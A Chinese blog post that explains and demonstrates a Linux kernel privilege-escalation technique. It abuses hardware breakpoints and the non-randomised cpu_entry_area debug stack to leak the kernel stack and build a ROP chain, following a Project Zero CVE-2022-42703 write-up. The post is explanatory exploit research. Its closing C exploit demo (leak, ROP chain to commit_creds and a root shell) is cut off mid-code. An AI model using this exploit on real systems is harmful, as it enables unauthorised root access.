一种借助硬件断点的提权思路分析与演示

前文

原文来自P0的博客,是基于CVE-2022-42703写的利用,这个漏洞是Jann Horn在linux内核的mm(memory management)子系统中发现的一个关于struct anon_vma的UAF漏洞,这个漏洞本身还是挺复杂的,我粗看了一遍也不是看的很明白(只能说菜)。

作者后续将这个漏洞通过cross page attack将struct anon_vma和pipe buffer制造overlap,再结合anon_vma本身的代码(folio_lock_anon_vma_read())将UAF转化成内核任意地址写的原语。需要注意,原文得到的任意地址写原语还附带非常致命的限制,比如写入的值会在很短时间内被恢复。

本文的重点即从得到内核任意地址写原语开始。

*Warning:下文中可能包含对P0原博客的粗糙翻译,有能力请直接看原文。

下文涉及内核源码时,均基于linux kernel 5.15.103

正文

先忘记原文的任意地址写原语的种种限制,假设我们有一个品相很好的任意写:

  1. 内核任意地址写8字节
  2. 可以无限次数触发
  3. 不会在短时间内被恢复

我们也会马上注意到一个问题,即此时还没有leak出KASLR,因此写modprobe_path之类的利用思路是不行的;且先不考虑想办法泄露堆地址做原语转化什么的事情,那能写哪里完成攻击?

Linux x86-64中,当CPU处理某些中断和异常时,它会切换到对应的栈中,并保存当时的寄存器值,这个栈被映射在一个静态且非随机化的虚拟地址中,不同的中断、异常类型有不同的栈。而这些栈存储在结构体struct cpu_entry_area的一个字段中。

既然说struct cpu_entry_area是静态且非随机化的,那它在什么位置呢?不妨看看内核函数是如何获取这个结构体位置的,在get_cpu_entry_area()中实现:

1
2
3
4
5
6
7
8
// >>> arch/x86/mm/cpu_entry_area.c:25
/* 25 */ noinstr struct cpu_entry_area *get_cpu_entry_area(int cpu)
/* 26 */ {
/* 27 */ unsigned long va = CPU_ENTRY_AREA_PER_CPU + cpu * CPU_ENTRY_AREA_SIZE;
/* 28 */ BUILD_BUG_ON(sizeof(struct cpu_entry_area) % PAGE_SIZE != 0);
/* 29 */
/* 30 */ return (struct cpu_entry_area *) va;
/* 31 */ }

将宏展开,会得到如下结果:

1
va = (((-4UL) << 39) + ((1UL) << 12)) + cpu * (sizeof(struct cpu_entry_area));

如果还嫌结果不够直白,可以直接从编译完的vmlinux中看,在我编译的内核中,也就是0xfffffe0000001000这个地址了:

那处理中断的栈在结构体的位置呢?注意到struct cpu_entry_area中的estacks字段,它存放了IST(Interrupt Stack Table 中断栈表)项中所用到的栈:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
// >>> arch/x86/include/asm/cpu_entry_area.h:82
/* 82 */ /*
/* 83 */ * cpu_entry_area is a percpu region that contains things needed by the CPU
/* 84 */ * and early entry/exit code. Real types aren't used for all fields here
/* 85 */ * to avoid circular header dependencies.
/* 86 */ *
/* 87 */ * Every field is a virtual alias of some other allocated backing store.
/* 88 */ * There is no direct allocation of a struct cpu_entry_area.
/* 89 */ */
/* 90 */ struct cpu_entry_area {
------
/* 114 */ #ifdef CONFIG_X86_64
/* 115 */ /*
/* 116 */ * Exception stacks used for IST entries with guard pages.
/* 117 */ */
/* 118 */ struct cea_exception_stacks estacks;
/* 119 */ #endif
------
/* 130 */ };

struct cea_exception_stacks中针对每一种类型都有对应的栈:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
// >>> arch/x86/include/asm/cpu_entry_area.h:19
/* 19 */ /* Macro to enforce the same ordering and stack sizes */
/* 20 */ #define ESTACKS_MEMBERS(guardsize, optional_stack_size) \
/* 21 */ char DF_stack_guard[guardsize]; \
/* 22 */ char DF_stack[EXCEPTION_STKSZ]; \
/* 23 */ char NMI_stack_guard[guardsize]; \
/* 24 */ char NMI_stack[EXCEPTION_STKSZ]; \
/* 25 */ char DB_stack_guard[guardsize]; \
/* 26 */ char DB_stack[EXCEPTION_STKSZ]; \
/* 27 */ char MCE_stack_guard[guardsize]; \
/* 28 */ char MCE_stack[EXCEPTION_STKSZ]; \
/* 29 */ char VC_stack_guard[guardsize]; \
/* 30 */ char VC_stack[optional_stack_size]; \
/* 31 */ char VC2_stack_guard[guardsize]; \
/* 32 */ char VC2_stack[optional_stack_size]; \
/* 33 */ char IST_top_guard[guardsize]; \
------
/* 40 */ /* The effective cpu entry area mapping with guard pages. */
/* 41 */ struct cea_exception_stacks {
/* 42 */ ESTACKS_MEMBERS(PAGE_SIZE, EXCEPTION_STKSZ)
/* 43 */ };

这些栈通常用于从用户态进入内核态的入口处,但他们也被用于在内核态处理异常。其中这些栈在tss_setup_ist()中被注册对应的IST项:

1
2
3
4
5
6
7
8
9
10
11
// >>> arch/x86/kernel/cpu/common.c:2006
/* 2006 */ static inline void tss_setup_ist(struct tss_struct *tss)
/* 2007 */ {
/* 2008 */ /* Set up the per-CPU TSS IST stacks */
/* 2009 */ tss->x86_tss.ist[IST_INDEX_DF] = __this_cpu_ist_top_va(DF);
/* 2010 */ tss->x86_tss.ist[IST_INDEX_NMI] = __this_cpu_ist_top_va(NMI);
/* 2011 */ tss->x86_tss.ist[IST_INDEX_DB] = __this_cpu_ist_top_va(DB);
/* 2012 */ tss->x86_tss.ist[IST_INDEX_MCE] = __this_cpu_ist_top_va(MCE);
/* 2013 */ /* Only mapped when SEV-ES is active */
/* 2014 */ tss->x86_tss.ist[IST_INDEX_VC] = __this_cpu_ist_top_va(VC);
/* 2015 */ }

在x86-64中,IST(Interrupt Stack Table 中断栈表)有7个per-cpu的入口,其中有诸如Double Fault、NMI、DEBUG等中断:

1
2
3
4
5
6
7
8
9
// >>> arch/x86/include/asm/page_64_types.h:24
/* 24 */ /*
/* 25 */ * The index for the tss.ist[] array. The hardware limit is 7 entries.
/* 26 */ */
/* 27 */ #define IST_INDEX_DF 0
/* 28 */ #define IST_INDEX_NMI 1
/* 29 */ #define IST_INDEX_DB 2
/* 30 */ #define IST_INDEX_MCE 3
/* 31 */ #define IST_INDEX_VC 4

中断所对应的函数在def_idts数组中声明,其中DEBUG对应的处理函数为asm_exc_debug()

1
2
3
4
5
6
7
8
9
10
11
12
13
// >>> arch/x86/kernel/idt.c:73
/* 73 */ /*
/* 74 */ * The default IDT entries which are set up in trap_init() before
/* 75 */ * cpu_init() is invoked. Interrupt stacks cannot be used at that point and
/* 76 */ * the traps which use them are reinitialized with IST after cpu_init() has
/* 77 */ * set up TSS.
/* 78 */ */
/* 79 */ static const __initconst struct idt_data def_idts[] = {
------
/* 100 */ ISTG(X86_TRAP_DB, asm_exc_debug, IST_INDEX_DB),
------
/* 116 */ };

函数声明处:

1
2
3
4
5
6
7
8
9
10
11
// >>> arch/x86/include/asm/idtentry.h:602
/* 602 */ /* #DB */
/* 603 */ #ifdef CONFIG_X86_64
/* 604 */ DECLARE_IDTENTRY_DEBUG(X86_TRAP_DB, exc_debug);

// 将宏展开后得到:

void asm_exc_debug(void);
void xen_asm_exc_debug(void);
void exc_debug(struct pt_regs *regs);
void noist_exc_debug(struct pt_regs *regs);

函数实现处:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
// >>> arch/x86/kernel/traps.c:1026
/* 1026 */ /* IST stack entry */
/* 1027 */ DEFINE_IDTENTRY_DEBUG(exc_debug)
/* 1028 */ {
/* 1029 */ exc_debug_kernel(regs, debug_read_clear_dr6());
/* 1030 */ }
/* 1031 */
/* 1032 */ /* User entry, runs on regular task stack */
/* 1033 */ DEFINE_IDTENTRY_DEBUG_USER(exc_debug)
/* 1034 */ {
/* 1035 */ exc_debug_user(regs, debug_read_clear_dr6());
/* 1036 */ }

// 将宏展开后得到:

/* IST stack entry */
__attribute__((__noinline__)) __attribute__((no_instrument_function))
__attribute((__section__(".noinstr.text")))
__attribute__((__no_profile_instrument_function__)) void
exc_debug(struct pt_regs *regs)
{
exc_debug_kernel(regs, debug_read_clear_dr6());
}

/* User entry, runs on regular task stack */
__attribute__((__noinline__)) __attribute__((no_instrument_function))
__attribute((__section__(".noinstr.text")))
__attribute__((__no_profile_instrument_function__)) void
noist_exc_debug(struct pt_regs *regs)
{
exc_debug_user(regs, debug_read_clear_dr6());
}

为什么我们要看DEBUG中断而不是其他的几种中断呢?因为DEBUG中断可以通过在用户态使用ptrace设置硬件断点后触发硬件断点来触发中断。且通过硬件断点来触发中断既可以在用户态触发,又可以在内核层触发。是后续利用中最理想的选择。

我们可以编写如下函数来给一个内存地址设置1字节的读写硬件断点(注意这是x86-64下的实现),对应的CPU寄存器可以参考wiki

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
#include <sys/ptrace.h>
#include <sys/user.h>

#define DR_OFFSET(num) ((void *)(&((struct user *)0)->u_debugreg[num]))
void create_hbp(pid_t pid, void *addr) {

// Set DR0: HBP address
if (ptrace(PTRACE_POKEUSER, pid, DR_OFFSET(0), addr) != 0) {
die("create hbp ptrace dr0: %m");
}

/* Set DR7: bit 0 enables DR0 breakpoint. Bit 8 ensures the processor stops
* on the instruction which causes the exception. bits 16,17 means we stop
* on data read or write. */
unsigned long dr_7 = (1 << 0) | (1 << 8) | (1 << 16) | (1 << 17);
if (ptrace(PTRACE_POKEUSER, pid, DR_OFFSET(7), (void *)dr_7) != 0) {
die("create hbp ptrace dr7: %m");
}
}

之后被ptrace的子进程可以使用如下两种方式来触发硬件断点,用户态触发硬件断点会进入exc_debug_user()函数处理,而类似uname()中使用copy_from/to_user()时触发的硬件断点会进入exc_debug_kernel()函数处理:

1
2
3
4
5
// 触发内核态函数 `exc_debug_user()`
*(char *)buf = 1;

// 在内核态使用`copy_from/to_user()`时触发内核态函数 `exc_debug_kernel()`
uname((void *)buf);

(由于cpu_entry_area是per-cpu的,因此下面调试时我们用于触发断点的进程被锁在CPU-0中)

我们上内核中实际调试一下,我们在exc_debug_kernel()处下断点,将参数regs打印出来,可以发现ip指针位于copy_to_user()内部实际拷贝的汇编处,其中di为我们用户态的指针,si为内核态的指针,从si拷贝到di。拷贝是先8字节一次进行拷贝,cx中保存了还需拷贝的次数。(一个细节是,触发硬件断点时rep movs指令已经拷贝了一次,也就是一个8字节)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
pwndbg> bt
#0 exc_debug_kernel (dr6=1, regs=0xfffffe0000010f58) at arch/x86/kernel/traps.c:892
#1 exc_debug (regs=0xfffffe0000010f58) at arch/x86/kernel/traps.c:1029
#2 0xffffffff82000c2a in asm_exc_debug () at ./arch/x86/include/asm/idtentry.h:604
#3 0x0000000000000000 in ?? ()
pwndbg> p/x * regs
$1 = {
r15 = 0x0,
r14 = 0x0,
r13 = 0x0,
r12 = 0xffff888005589780,
bp = 0xffffc9000020fce0,
bx = 0x12340000,
r11 = 0x0,
r10 = 0x0,
r9 = 0x0,
r8 = 0x0,
ax = 0x12340186,
cx = 0x2f,
dx = 0x6,
si = 0xffffc9000020fcfa,
di = 0x12340008,
orig_ax = 0xffffffffffffffff,
ip = 0xffffffff816e039c,
cs = 0x10,
flags = 0x40206,
sp = 0xffffc9000020fcd8,
ss = 0x18
}
pwndbg> x/4i 0xffffffff816e039c
0xffffffff816e039c <copy_user_generic_string+44>: rep movs QWORD PTR es:[rdi],QWORD PTR ds:[rsi]
0xffffffff816e039f <copy_user_generic_string+47>: mov ecx,edx
0xffffffff816e03a1 <copy_user_generic_string+49>: rep movs BYTE PTR es:[rdi],BYTE PTR ds:[rsi]
0xffffffff816e03a3 <copy_user_generic_string+51>: xor eax,eax
pwndbg> tele regs.sp
00:0000│ 0xffffc9000020fcd8 —▸ 0xffffffff816833b0 (_copy_to_user+32) ◂— mov eax, eax
01:0008│ 0xffffc9000020fce0 —▸ 0xffffc9000020fe90 —▸ 0xffffc9000020fea0 —▸ 0xffffc9000020ff48 ◂— 0x0
02:0010│ 0xffffc9000020fce8 —▸ 0xffffffff810e0a93 (__do_sys_newuname+147) ◂— test rax, rax
03:0018│ 0xffffc9000020fcf0 ◂— 0x78756e694c0004
04:0020│ 0xffffc9000020fcf8 ◂— 0x0

而这个regs参数,正处于struct cpu_entry_area中的 DEBUG Exception stack中:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
pwndbg> p/x & regs.cx
$1 = 0xfffffe0000010fb0
pwndbg> p/x & ((struct cpu_entry_area*)0xfffffe0000001000)->estacks.DB_stack
$2 = 0xfffffe000000f000
pwndbg> p/x sizeof(((struct cpu_entry_area*)0xfffffe0000001000)->estacks.DB_stack)
$3 = 0x2000
pwndbg> hexdump 0xfffffe000000f000 0x2000
+0000 0xfffffe000000f000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
... ↓ skipped 495 identical lines (7920 bytes)
+1f00 0xfffffe0000010f00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+1f10 0xfffffe0000010f10 94 f5 e2 81 ff ff ff ff 01 00 00 00 00 00 00 00
+1f20 0xfffffe0000010f20 00 79 e0 f5 d8 44 6e 9d 01 00 00 00 00 00 00 00
+1f30 0xfffffe0000010f30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+1f40 0xfffffe0000010f40 00 60 84 1f 00 00 00 00 59 0f 01 00 00 fe ff ff
+1f50 0xfffffe0000010f50 2a 0c 00 82 ff ff ff ff 00 00 00 00 00 00 00 00
+1f60 0xfffffe0000010f60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+1f70 0xfffffe0000010f70 80 c6 a9 1f 80 88 ff ff 68 bc 4f 00 00 c9 ff ff
+1f80 0xfffffe0000010f80 00 00 34 12 00 00 00 00 00 00 00 00 00 00 00 00
+1f90 0xfffffe0000010f90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+1fa0 0xfffffe0000010fa0 00 00 00 00 00 00 00 00 86 01 34 12 00 00 00 00
+1fb0 0xfffffe0000010fb0 2f 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00
+1fc0 0xfffffe0000010fc0 82 bc 4f 00 00 c9 ff ff 08 00 34 12 00 00 00 00
+1fd0 0xfffffe0000010fd0 ff ff ff ff ff ff ff ff 9c 03 6e 81 ff ff ff ff
+1fe0 0xfffffe0000010fe0 10 00 00 00 00 00 00 00 06 02 04 00 00 00 00 00
+1ff0 0xfffffe0000010ff0 60 bc 4f 00 00 c9 ff ff 18 00 00 00 00 00 00 00

因此这个 regs.cx 就是在不知道KASLR时一个非常好的攻击对象。

再来看一下uname调用时的代码,copy_to_user的来源是内核栈 上的一个临时对象:

1
2
3
4
5
6
7
8
9
10
// >>> kernel/sys.c:1280
/* 1280 */ SYSCALL_DEFINE1(newuname, struct new_utsname __user *, name)
/* 1281 */ {
/* 1282 */ struct new_utsname tmp;
/* 1283 */
/* 1284 */ down_read(&uts_sem);
/* 1285 */ memcpy(&tmp, utsname(), sizeof(tmp));
/* 1286 */ up_read(&uts_sem);
/* 1287 */ if (copy_to_user(name, &tmp, sizeof(tmp)))
/* 1288 */ return -EFAULT;

如果此时另一个进程利用漏洞在victim进程还处于处理copy_to_user时触发的硬件断点中断时修改了regs.cx的值,中断处理完毕重新将栈切换回copy_to_user,由于cx值被修改,会拷贝比原先多的内容到用户态buffer,从而泄露内核栈上的stack canary、函数返回地址等。

如P0博客中这张图所示:

举一反三,如果找到一个目标地址为栈上临时变量的copy_from_user调用,通过硬件断点和漏洞攻击就能将更多的数据拷贝到内核栈上,从而制造出ROP攻击;在P0的博客中用到了prctl中的一个子函数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
// >>> kernel/sys.c:2274
/* 2274 */ SYSCALL_DEFINE5(prctl, int, option, unsigned long, arg2, unsigned long, arg3,
/* 2275 */ unsigned long, arg4, unsigned long, arg5)
/* 2276 */ {
------
/* 2286 */ switch (option) {
------
/* 2417 */ case PR_SET_MM:
// 调用 `prctl_set_mm()`
/* 2418 */ error = prctl_set_mm(arg2, arg3, arg4, arg5);
/* 2419 */ break;

// >>> kernel/sys.c:2094
/* 2094 */ static int prctl_set_mm(int opt, unsigned long addr,
/* 2095 */ unsigned long arg4, unsigned long arg5)
/* 2096 */ {
------
/* 2111 */ #ifdef CONFIG_CHECKPOINT_RESTORE
/* 2112 */ if (opt == PR_SET_MM_MAP || opt == PR_SET_MM_MAP_SIZE)
// 调用 `prctl_set_mm_map()`
/* 2113 */ return prctl_set_mm_map(opt, (const void __user *)addr, arg4);

// >>> kernel/sys.c:1955
/* 1955 */ #ifdef CONFIG_CHECKPOINT_RESTORE
/* 1956 */ static int prctl_set_mm_map(int opt, const void __user *addr, unsigned long data_size)
/* 1957 */ {
// 目标栈上临时对象
/* 1958 */ struct prctl_mm_map prctl_map = { .exe_fd = (u32)-1, };
------
// 调用copy_from_user,结合任意地址写原语和硬件断点,做到栈溢出ROP攻击
/* 1973 */ if (copy_from_user(&prctl_map, addr, sizeof(prctl_map)))
/* 1974 */ return -EFAULT;
/* 1975 */
// 对prctl_map对象内容进行校验,失败后快速返回触发ROP,不多调用函数
/* 1976 */ error = validate_prctl_map_addr(&prctl_map);
/* 1977 */ if (error)
/* 1978 */ return error;

总结下攻击流程:

  1. 父进程fork出子进程victim
  2. 父进程ptrace victim,父进程给victim设置硬件断点
  3. 父进程fork出子进程trigger,循环触发任意地址写原语修改DEBUG Exception stack中的cx寄存器值
  4. victim进程循环调用uname syscall,并检查buffer中是否发现stack leak,如果发现就发送给父进程
  5. 父进程拿着stack leak编写出ROP代码发送给victim
  6. victim进程循环调用prctl syscall触发目标copy_from_user,直到发生栈溢出ROP提权。

Exploit Demo

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
// =-=-=-=-=-=-=-= INCLUDE =-=-=-=-=-=-=-=
#define _GNU_SOURCE

#include <assert.h>
#include <fcntl.h>
#include <poll.h>
#include <sched.h>
#include <signal.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/prctl.h>
#include <sys/ptrace.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/user.h>
#include <sys/utsname.h>
#include <sys/wait.h>
#include <syscall.h>
#include <unistd.h>

// =-=-=-=-=-=-=-= DEFINE =-=-=-=-=-=-=-=

#define COLOR_GREEN "\033[32m"
#define COLOR_RED "\033[31m"
#define COLOR_YELLOW "\033[33m"
#define COLOR_DEFAULT "\033[0m"

#define logd(fmt, ...) \
dprintf(2, "[*] %s:%d " fmt "\n", __FILE__, __LINE__, ##__VA_ARGS__)
#define logi(fmt, ...) \
dprintf(2, COLOR_GREEN "[+] %s:%d " fmt "\n" COLOR_DEFAULT, __FILE__, \
__LINE__, ##__VA_ARGS__)
#define logw(fmt, ...) \
dprintf(2, COLOR_YELLOW "[!] %s:%d " fmt "\n" COLOR_DEFAULT, __FILE__, \
__LINE__, ##__VA_ARGS__)
#define loge(fmt, ...) \
dprintf(2, COLOR_RED "[-] %s:%d " fmt "\n" COLOR_DEFAULT, __FILE__, \
__LINE__, ##__VA_ARGS__)
#define die(fmt, ...) \
do { \
loge(fmt, ##__VA_ARGS__); \
loge("Exit at line %d", __LINE__); \
exit(1); \
} while (0)

#define GLOBAL_MMAP_ADDR ((char *)(0x12340000))
#define GLOBAL_MMAP_LENGTH (0x2000)

// ROP stuff
#define ROP_START_OFF (0x44)
#define CANARY_OFF (0x3d)
#define ROP_CNT (0x80)
#define o(x) (kbase + x)
#define pop_rdi o(0xb26a0)
#define pop_rdx o(0xa9eb57)
#define pop_rcx o(0x3468c3)
#define bss o(0x2595000)
#define dl_to_rdi o(0x20dd24) // mov byte ptr [rdi], dl ; ret
#define push_rax_jmp_qword_rcx o(0x4d6870) // push rax ; jmp qword ptr [rcx]
#define commit_creds o(0xf8240)
#define prepare_kernel_cred o(0xf8520)
#define kpti_trampoline \
o(0x10010e6) // in swapgs_restore_regs_and_return_to_usermode
#define somewhere_writable (bss)

// =-=-=-=-=-=-=-= GLOBAL VAR =-=-=-=-=-=-=-=

unsigned long user_cs, user_ss, user_eflags, user_sp, user_ip;

struct typ_cmd {
uint64_t addr;
uint64_t val;
};

int vuln_fd;
pid_t child;
pid_t trigger;

int sync_pipe[2][2];

// =-=-=-=-=-=-=-= FUNCTION =-=-=-=-=-=-=-=

void get_shell() {
int uid;
if (!(uid = getuid())) {
logi("root get!!");
execl("/bin/sh", "sh", NULL);
} else {
die("gain root failed, uid: %d", uid);
}
}

void init_tf_work(void) {
asm("movq %%cs, %0\n"
"movq %%ss, %1\n"
"movq %%rsp, %3\n"
"pushfq\n"
"popq %2\n"
: "=r"(user_cs), "=r"(user_ss), "=r"(user_eflags), "=r"(user_sp)
:
: "memory");

user_ip = (uint64_t)&get_shell;
user_sp = 0xf000 +
(uint64_t)mmap(0, 0x10000, 6, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
}

void bind_cpu(int cpu_idx) {
cpu_set_t my_set;
CPU_ZERO(&my_set);
CPU_SET(cpu_idx, &my_set);
if (sched_setaffinity(0, sizeof(cpu_set_t), &my_set)) {
die("sched_setaffinity: %m");
}
}

void hexdump(const void *data, size_t size) {
char ascii[17];
size_t i, j;
ascii[16] = '\0';
for (i = 0; i < size; ++i) {
dprintf(2, "%02X ", ((unsigned char *)data)[i]);
if (((unsigned char *)data)[i] >= ' ' &&
((unsigned char *)data)[i] <= '~') {
ascii[i % 16] = ((unsigned char *)data)[i];
} else {
ascii[i % 16] = '.';
}
if ((i + 1) % 8 == 0 || i + 1 == size) {
dprintf(2, " ");
if ((i + 1) % 16 == 0) {
dprintf(2, "| %s \n", ascii);
} else if (i + 1 == size) {
ascii[(i + 1) % 16] = '\0';
if ((i + 1) % 16 <= 8) {
dprintf(2, " ");
}
for (j = (i + 1) % 16; j < 16; ++j) {
dprintf(2, " ");
}
dprintf(2, "| %s \n", ascii);
}
}
}
}

#define DR_OFFSET(num) ((void *)(&((struct user *)0)->u_debugreg[num]))
void create_hbp(pid_t pid, void *addr) {

// Set DR0: HBP address
if (ptrace(PTRACE_POKEUSER, pid, DR_OFFSET(0), addr) != 0) {
die("create hbp ptrace dr0: %m");
}

/* Set DR7: bit 0 enables DR0 breakpoint. Bit 8 ensures the processor stops
* on the instruction which causes the exception. bits 16,17 means we stop
* on data read or write. */
unsigned long dr_7 = (1 << 0) | (1 << 8) | (1 << 16) | (1 << 17);
if (ptrace(PTRACE_POKEUSER, pid, DR_OFFSET(7), (void *)dr_7) != 0) {
die("create hbp ptrace dr7: %m");
}
}

void arb_write(int fd, uint64_t addr, uint64_t val) {
struct typ_cmd cmd = {addr, val};
ioctl(fd, 0, &cmd);
}

void do_init() {
logd("do init ...");
init_tf_work();

vuln_fd = open("/dev/vuln", O_RDONLY);
if (vuln_fd < 0) {
die("open vuln_fd: %m");
}

// global mmap
void *p = mmap(GLOBAL_MMAP_ADDR, GLOBAL_MMAP_LENGTH, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (p == MAP_FAILED) {
die("mmap: %m");
}

if (pipe(sync_pipe[0])) {
die("pipe: %m");
}
if (pipe(sync_pipe[1])) {
die("pipe: %m");
}
}

void fn_child() {
logd("child MUST bind to cpu-0");
bind_cpu(0);

char *name_buf = (char *)GLOBAL_MMAP_ADDR;
memset(GLOBAL_MMAP_ADDR, 0, GLOBAL_MMAP_LENGTH);

// call ptrace
if (ptrace(PTRACE_TRACEME, 0, NULL, NULL) != 0) {
die("ptrace PTRACE_TRACEME: %m");
}

uint64_t skip_cnt =
(sizeof(struct utsname) + sizeof(uint64_t) - 1) / sizeof(uint64_t);

int step = 0;
bool loop = true;
while (loop) {
// halt, and wait to be told to hit watchpoint
raise(SIGSTOP);

switch (step) {
case 0: {
// trigger hw_breakpoint and leak data from stack
#if (0)
*(char *)name_buf = 1; // trigger `exc_debug_user()`
#else
uname((void *)name_buf); // trigger `exc_debug_kernel()`
#endif
// check if data leaked
for (int i = skip_cnt; i < 100; i++) {
if (((uint64_t *)name_buf)[i]) {
logi("child: FOUND kernel stack leak !!");
write(sync_pipe[1][1], GLOBAL_MMAP_ADDR,
GLOBAL_MMAP_LENGTH);
step++;
break;
}
}
} break;
case 1: {
// build ROP
logd("child: waiting to recv rop gadget ...");
read(sync_pipe[0][0], GLOBAL_MMAP_ADDR, GLOBAL_MMAP_LENGTH);
logd("child: recv rop gadget");
step++;
} break;
case 2: {
// ROP attack
prctl(PR_SET_MM, PR_SET_MM_MAP, GLOBAL_MMAP_ADDR,
sizeof(struct prctl_mm_map), 0);
} break;
default:
break;
}
}

return;
}

void fn_trigger() {
logd("trigger: bind trigger to other cpu, e.g. cpu-1");
bind_cpu(1);

logd("trigger: modify rcx in cpu-0's `cpu_entry_area` DB_STACK infinitely");
while (1) {
#define CPU_0_cpu_entry_area_DB_STACK_rcx_loc (0xfffffe0000010fb0)
#define OOB_SIZE(x) (x / 8)
arb_write(vuln_fd, CPU_0_cpu_entry_area_DB_STACK_rcx_loc,
OOB_SIZE(0x400));
}
}

int main(void) {
do_init();

logd("fork victim child ...");
switch (child = fork()) {
case -1:
die("fork child: %m");
break;
case 0:
// victim child
fn_child();
exit(0);
break;
default:
// parent wait child
waitpid(child, NULL, __WALL);
break;
}
logd("child pid: %d", child);

// kill child on exit
if (ptrace(PTRACE_SETOPTIONS, child, NULL, (void *)PTRACE_O_EXITKILL) < 0) {
die("ptrace set PTRACE_O_EXITKILL: %m");
}

logd("create hw_breakpoint for child");
create_hbp(child, (void *)GLOBAL_MMAP_ADDR);

logd("fork write-anywhere primitive trigger ...");
switch (trigger = fork()) {
case -1:
die("fork trigger: %m");
break;
case 0:
fn_trigger();
exit(0);
break;
default:
break;
}

logd("waiting for stack data leak ...");
struct pollfd fds = {.fd = sync_pipe[1][0], .events = POLLIN};
while (1) {
if (ptrace(PTRACE_CONT, child, NULL, NULL) < 0) {
die("failed to PTRACE_CONT: %m");
}
waitpid(child, NULL, __WALL);

// use poll() to check if there is data to read
int ret = poll(&fds, 1, 0);
if (ret > 0 && (fds.revents & POLLIN)) {
read(sync_pipe[1][0], GLOBAL_MMAP_ADDR, GLOBAL_MMAP_LENGTH);
break;
}
}

// leak from come from victim child
hexdump(GLOBAL_MMAP_ADDR + sizeof(struct utsname), 0x100);
uint64_t *leak_buffer =
(uint64_t *)(GLOBAL_MMAP_ADDR + sizeof(struct utsname));
uint64_t canary = leak_buffer[0];
logi("canary: 0x%lx", canary);
uint64_t leak_kaddr = leak_buffer[4];
logi("leak_kaddr: 0x%lx", leak_kaddr);
uint64_t kbase = leak_kaddr - 0xe0b32;
logi("kbase: 0x%lx", kbase);

// start build rop gadget ...
logd("build rop ...");
uint64_t rop[ROP_START_OFF + ROP_CNT] = {0};
rop[CANARY_OFF] = canary;
uint64_t gadget_data = pop_rdi;
uint64_t rop_buf[ROP_CNT] = {
// prepare_kernel_cred(0)
pop_rdi, 0, prepare_kernel_cred,

// mov qword ptr[somewhere_writable], gadget_data
pop_rdx, (gadget_data >> (8 * 0)) & 0xff, pop_rdi,
somewhere_writable + 0, dl_to_rdi, pop_rdx,
(gadget_data >> (8 * 1)) & 0xff, pop_rdi, somewhere_writable + 1,
dl_to_rdi, pop_rdx, (gadget_data >> (8 * 2)) & 0xff, pop_rdi,
somewhere_writable + 2, dl_to_rdi, pop_rdx,
(gadget_data >> (8 * 3)) & 0xff, pop_rdi, somewhere_writable + 3,
dl_to_rdi, pop_rdx, (gadget_data >> (8 * 4)) & 0xff, pop_rdi,
somewhere_writable + 4, dl_to_rdi, pop_rdx,
(gadget_data >> (8 * 5)) & 0xff, pop_rdi, somewhere_writable + 5,
dl_to_rdi, pop_rdx, (gadget_data >> (8 * 6)) & 0xff, pop_rdi,
somewhere_writable + 6, dl_to_rdi, pop_rdx,
(gadget_data >> (8 * 7)) & 0xff, pop_rdi, somewhere_writable + 7,
dl_to_rdi,

// mov rdi, rax
pop_rcx, somewhere_writable, push_rax_jmp_qword_rcx,

// commit_creds(cred)
commit_creds,

// return to userland
kpti_trampoline,
// frame
0xdeadbeef, 0xbaadf00d, user_ip, user_cs, user_eflags,
user_sp & 0xffffffffffffff00, user_ss};
memcpy(rop + ROP_START_OFF, rop_buf, sizeof(rop_buf));

logd("send rop gadget to victim child ...");
